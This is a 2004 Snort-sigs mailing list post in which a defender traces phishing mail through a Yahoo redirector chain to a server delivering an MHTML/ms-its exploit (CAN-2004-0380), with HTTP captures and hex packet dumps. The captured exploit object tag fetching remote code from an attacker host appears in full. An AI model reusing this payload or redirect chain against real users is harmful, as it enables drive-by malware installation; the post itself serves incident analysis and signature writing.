[Snort-sigs] Perhaps a new worm type using MS MHTML parsing vulnerability (MS04013 : CAN-2004-0380)

Benoit Donneaux benoit.donneaux at ...2445...
Wed May 5 15:14:02 EDT 2004


He found a suspicious mail activity this morning on our netwok.

And you ???

Many mails with valid corporate RCPT :

-------- Original Message --------
Subject: RE:
Date: Wed, 05 May 2004 16:23:01 +0200 (MEST)
From: mailserver.domain.net <validrcpt1 at ...2459...>
To: validrcpt2 at ...2459...
<A 
href="http://drs.yahoo.com/domain.net/NEWS/*http://uisdfacoizuxcpojkfgskjfhskjn.cjb.net/www.YAHOO.com/#http://drs.yahoo.com/nrb.be/NEWS">
http://drs.yahoo.com/domain.net/NEWS
</A>
--------- End Of Message ---------

REM : Not the real message (copy/paste)

This url work with every "domain.net" value !

The real exploit is download of sixth step !!! Coincidence or volonteer ?
Vulnerability reference : CAN-2004-0380

1) Web access to yahoo redirector with an second web server on argument 
: uisdfacoizuxcpojkfgskjfhskjn.cjb.net

    GET 
/domain.net/NEWS/*http://uisdfacoizuxcpojkfgskjfhskjn.cjb.net/www.YAHOO.com/ 
HTTP/1.1
    Host: drs.yahoo.com
    ...
    
    HTTP/1.0 302 RD
    Location: http://uisdfacoizuxcpojkfgskjfhskjn.cjb.net/www.YAHOO.com/

2) Web access to uisdfacoizuxcpojkfgskjfhskjn.cjb.net
    
    GET /www.YAHOO.com/ HTTP/1.1
    Host: uisdfacoizuxcpojkfgskjfhskjn.cjb.net

    HTTP/1.1 200 OK
    ...
    <frame name="frame" 
src="http://www.terra.es/personal6/aport24/www.YAHOO.com/">
    <meta http-equiv="refresh" content="0; 
url=http://www.terra.es/personal6/aport24/www.YAHOO.com/">
    <a 
href="http://www.terra.es/personal6/aport24/www.YAHOO.com/">http://www.terra.es/personal6/aport24/www.YAHOO.com/</a>
    ...
    
    - The host name seem to be static... Today, but what's next ?
    - An other redirect + frame is served at /www.YAHOO.com (xxx.terra.es)

3) Web access to www.terra.es

    GET /personal6/aport24/www.YAHOO.com/ HTTP/1.1
    Host: www.terra.es
    ...

    HTTP/1.1 200 OK
    ...
   
 parent.navigate('http://www.terra.es/personal6/aport24/www.YAHOO.com/terra.html'); 

    ...
    
    GET /personal6/aport24/www.YAHOO.com/terra.html HTTP/1.1
    Host: www.terra.es
    ...

    HTTP/1.1 200 OK
    
    - I don't know how, perhaps in jscript, the critical web server is 
refered : counter.spros.com

    
6) Web access to counter.spros.com

    GET /1/count.html HTTP/1.1
    Host: counter.spros.com
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.4) 
Gecko/20030624 Netscape/7.1 (ax)
    Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1
    Accept-Language: fr-be,en-us;q=0.5
    Accept-Encoding: gzip,deflate
    Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
    Keep-Alive: 300
    Connection: keep-alive
    Referer: http://www.terra.es/personal6/aport24/www.YAHOO.com/terra.html

    HTTP/1.1 200 OK
    Date: Wed, 05 May 2004 22:32:28 GMT
    Server: Apache/2.0.40 (Red Hat Linux)
    Connection: close
    Transfer-Encoding: chunked
    Content-Type: text/html

    47
    <object data='ms-its:mhtml:file://C:zbc.mht!http://counter.spros.com/2/
    7
    sys.chm
    2f
    ::/newe.htm' type='text/x-scriptlet'></object>

    0

    - I think the malicious code is download here in object tag !
    - See here for a exploit sample : 
http://www.securityfocus.com/bid/9107/exploit/

MHTML Exploit trace :

05/05-17:04:15.785929 153.89.60.69:2344 -> 66.90.71.225:80
TCP TTL:127 TOS:0x0 ID:46174 IpLen:20 DgmLen:48 DF
******S* Seq: 0x4147C7A8  Ack: 0x0  Win: 0xFFFF  TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

05/05-17:04:15.910024 66.90.71.225:80 -> 153.89.60.69:2344
TCP TTL:47 TOS:0x0 ID:0 IpLen:20 DgmLen:48 DF
***A**S* Seq: 0xEF559B25  Ack: 0x4147C7A9  Win: 0x16D0  TcpLen: 28
TCP Options (4) => MSS: 1380 NOP NOP SackOK

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

05/05-17:04:15.910396 153.89.60.69:2344 -> 66.90.71.225:80
TCP TTL:127 TOS:0x0 ID:46194 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x4147C7A9  Ack: 0xEF559B26  Win: 0xFFFF  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

05/05-17:04:15.981910 153.89.60.69:2344 -> 66.90.71.225:80
TCP TTL:127 TOS:0x0 ID:46195 IpLen:20 DgmLen:574 DF
***AP*** Seq: 0x4147C7A9  Ack: 0xEF559B26  Win: 0xFFFF  TcpLen: 20
47 45 54 20 2F 31 2F 63 6F 75 6E 74 2E 68 74 6D  GET /1/count.htm
6C 20 48 54 54 50 2F 31 2E 31 0D 0A 48 6F 73 74  l HTTP/1.1..Host
3A 20 63 6F 75 6E 74 65 72 2E 73 70 72 6F 73 2E  : counter.spros.
63 6F 6D 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A  com..User-Agent:
20 4D 6F 7A 69 6C 6C 61 2F 35 2E 30 20 28 57 69   Mozilla/5.0 (Wi
6E 64 6F 77 73 3B 20 55 3B 20 57 69 6E 64 6F 77  ndows; U; Window
73 20 4E 54 20 35 2E 30 3B 20 65 6E 2D 55 53 3B  s NT 5.0; en-US;
20 72 76 3A 31 2E 34 29 20 47 65 63 6B 6F 2F 32   rv:1.4) Gecko/2
30 30 33 30 36 32 34 20 4E 65 74 73 63 61 70 65  0030624 Netscape
2F 37 2E 31 20 28 61 78 29 0D 0A 41 63 63 65 70  /7.1 (ax)..Accep
74 3A 20 74 65 78 74 2F 78 6D 6C 2C 61 70 70 6C  t: text/xml,appl
69 63 61 74 69 6F 6E 2F 78 6D 6C 2C 61 70 70 6C  ication/xml,appl
69 63 61 74 69 6F 6E 2F 78 68 74 6D 6C 2B 78 6D  ication/xhtml+xm
6C 2C 74 65 78 74 2F 68 74 6D 6C 3B 71 3D 30 2E  l,text/html;q=0.
39 2C 74 65 78 74 2F 70 6C 61 69 6E 3B 71 3D 30  9,text/plain;q=0
2E 38 2C 76 69 64 65 6F 2F 78 2D 6D 6E 67 2C 69  .8,video/x-mng,i
6D 61 67 65 2F 70 6E 67 2C 69 6D 61 67 65 2F 6A  mage/png,image/j
70 65 67 2C 69 6D 61 67 65 2F 67 69 66 3B 71 3D  peg,image/gif;q=
30 2E 32 2C 2A 2F 2A 3B 71 3D 30 2E 31 0D 0A 41  0.2,*/*;q=0.1..A
63 63 65 70 74 2D 4C 61 6E 67 75 61 67 65 3A 20  ccept-Language:
66 72 2D 62 65 2C 65 6E 2D 75 73 3B 71 3D 30 2E  fr-be,en-us;q=0.
35 0D 0A 41 63 63 65 70 74 2D 45 6E 63 6F 64 69  5..Accept-Encodi
6E 67 3A 20 67 7A 69 70 2C 64 65 66 6C 61 74 65  ng: gzip,deflate
0D 0A 41 63 63 65 70 74 2D 43 68 61 72 73 65 74  ..Accept-Charset
3A 20 49 53 4F 2D 38 38 35 39 2D 31 2C 75 74 66  : ISO-8859-1,utf
2D 38 3B 71 3D 30 2E 37 2C 2A 3B 71 3D 30 2E 37  -8;q=0.7,*;q=0.7
0D 0A 4B 65 65 70 2D 41 6C 69 76 65 3A 20 33 30  ..Keep-Alive: 30
30 0D 0A 43 6F 6E 6E 65 63 74 69 6F 6E 3A 20 6B  0..Connection: k
65 65 70 2D 61 6C 69 76 65 0D 0A 52 65 66 65 72  eep-alive..Refer
65 72 3A 20 68 74 74 70 3A 2F 2F 77 77 77 2E 74  er: http://www.t
65 72 72 61 2E 65 73 2F 70 65 72 73 6F 6E 61 6C  erra.es/personal
36 2F 61 70 6F 72 74 32 34 2F 77 77 77 2E 59 41  6/aport24/www.YA
48 4F 4F 2E 63 6F 6D 2F 74 65 72 72 61 2E 68 74  HOO.com/terra.ht
6D 6C 0D 0A 0D 0A                                ml....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

05/05-17:04:16.105456 66.90.71.225:80 -> 153.89.60.69:2344
TCP TTL:47 TOS:0x0 ID:22651 IpLen:20 DgmLen:40 DF
***A**** Seq: 0xEF559B26  Ack: 0x4147C9BF  Win: 0x1920  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

05/05-17:04:16.191541 66.90.71.225:80 -> 153.89.60.69:2344
TCP TTL:47 TOS:0x0 ID:22653 IpLen:20 DgmLen:117 DF
***AP*** Seq: 0xEF559BCD  Ack: 0x4147C9BF  Win: 0x1920  TcpLen: 20
34 37 0D 0A 3C 6F 62 6A 65 63 74 20 64 61 74 61  47..<object data
3D 27 6D 73 2D 69 74 73 3A 6D 68 74 6D 6C 3A 66  ='ms-its:mhtml:f
69 6C 65 3A 2F 2F 43 3A 7A 62 63 2E 6D 68 74 21  ile://C:zbc.mht!
68 74 74 70 3A 2F 2F 63 6F 75 6E 74 65 72 2E 73  http://counter.s
70 72 6F 73 2E 63 6F 6D 2F 32 2F 0D 0A           pros.com/2/..

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

05/05-17:04:16.191542 66.90.71.225:80 -> 153.89.60.69:2344
TCP TTL:47 TOS:0x0 ID:22652 IpLen:20 DgmLen:207 DF
***AP*** Seq: 0xEF559B26  Ack: 0x4147C9BF  Win: 0x1920  TcpLen: 20
48 54 54 50 2F 31 2E 31 20 32 30 30 20 4F 4B 0D  HTTP/1.1 200 OK.
0A 44 61 74 65 3A 20 57 65 64 2C 20 30 35 20 4D  .Date: Wed, 05 M
61 79 20 32 30 30 34 20 32 32 3A 33 32 3A 32 38  ay 2004 22:32:28
20 47 4D 54 0D 0A 53 65 72 76 65 72 3A 20 41 70   GMT..Server: Ap
61 63 68 65 2F 32 2E 30 2E 34 30 20 28 52 65 64  ache/2.0.40 (Red
20 48 61 74 20 4C 69 6E 75 78 29 0D 0A 43 6F 6E   Hat Linux)..Con
6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A  nection: close..
54 72 61 6E 73 66 65 72 2D 45 6E 63 6F 64 69 6E  Transfer-Encodin
67 3A 20 63 68 75 6E 6B 65 64 0D 0A 43 6F 6E 74  g: chunked..Cont
65 6E 74 2D 54 79 70 65 3A 20 74 65 78 74 2F 68  ent-Type: text/h
74 6D 6C 0D 0A 0D 0A                             tml....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

05/05-17:04:16.191543 66.90.71.225:80 -> 153.89.60.69:2344
TCP TTL:47 TOS:0x0 ID:22654 IpLen:20 DgmLen:110 DF
***AP**F Seq: 0xEF559C1A  Ack: 0x4147C9BF  Win: 0x1920  TcpLen: 20
37 0D 0A 73 79 73 2E 63 68 6D 0D 0A 32 66 0D 0A  7..sys.chm..2f..
3A 3A 2F 6E 65 77 65 2E 68 74 6D 27 20 74 79 70  ::/newe.htm' typ
65 3D 27 74 65 78 74 2F 78 2D 73 63 72 69 70 74  e='text/x-script
6C 65 74 27 3E 3C 2F 6F 62 6A 65 63 74 3E 0A 0D  let'></object>..
0A 30 0D 0A 0D 0A                                .0....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

05/05-17:04:16.192119 153.89.60.69:2344 -> 66.90.71.225:80
TCP TTL:127 TOS:0x0 ID:46196 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x4147C9BF  Ack: 0xEF559B26  Win: 0xFFFF  TcpLen: 32
TCP Options (3) => NOP NOP Sack: 61269 at ...2460...

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

05/05-17:04:16.192120 153.89.60.69:2344 -> 66.90.71.225:80
TCP TTL:127 TOS:0x0 ID:46197 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x4147C9BF  Ack: 0xEF559C61  Win: 0xFEC5  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

05/05-17:04:16.192858 153.89.60.69:2344 -> 66.90.71.225:80
TCP TTL:127 TOS:0x0 ID:46200 IpLen:20 DgmLen:40 DF
***A***F Seq: 0x4147C9BF  Ack: 0xEF559C61  Win: 0xFEC5  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

05/05-17:04:16.315621 66.90.71.225:80 -> 153.89.60.69:2344
TCP TTL:47 TOS:0x0 ID:22655 IpLen:20 DgmLen:40 DF
***A**** Seq: 0xEF559C61  Ack: 0x4147C9C0  Win: 0x1920  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

Ciso IDS S91 match the Illegal MHTML URL synthax.

I don't know for current snort ruleset...






More information about the Snort-sigs mailing list